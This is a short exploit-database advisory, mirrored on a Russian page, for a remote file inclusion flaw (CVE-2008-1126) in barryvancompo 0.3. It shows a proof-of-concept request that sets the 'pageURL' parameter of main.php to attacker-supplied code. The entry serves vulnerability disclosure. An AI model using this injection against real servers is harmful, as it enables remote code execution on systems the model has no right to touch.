- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5202
- Проверка EDB
-
- Пройдено
- Автор
- MHZ91
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-1126
- Дата публикации
- 2008-02-28
Код:
--==+================================================================================+==--
--==+ barryvancompo-0.3 Remote File Inclusion +==--
--==+================================================================================+==--
Author: MhZ91
Title: barryvancompo-0.3 Remote File Inclusion
Download: http://sourceforge.net/projects/barryvancompo/
Bug: Remote File Inclusion
Info: The barryvan compo manager is a PHP, Smarty and MySQL-based system for running, organising, and maintaining competitions. It is particularly designed for use within the computer music "scene".
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
barryvancompo-0.3 present a variable "pageURL" not definited in this file
main.php
(and all files require it)
we can exploit it by the variable "pageURL", for example
http://www.example.com/main.php?pageURL=[Evil_Code]
[*]----------------------------------------------------------
# milw0rm.com [2008-02-28]- Источник
- www.exploit-db.com
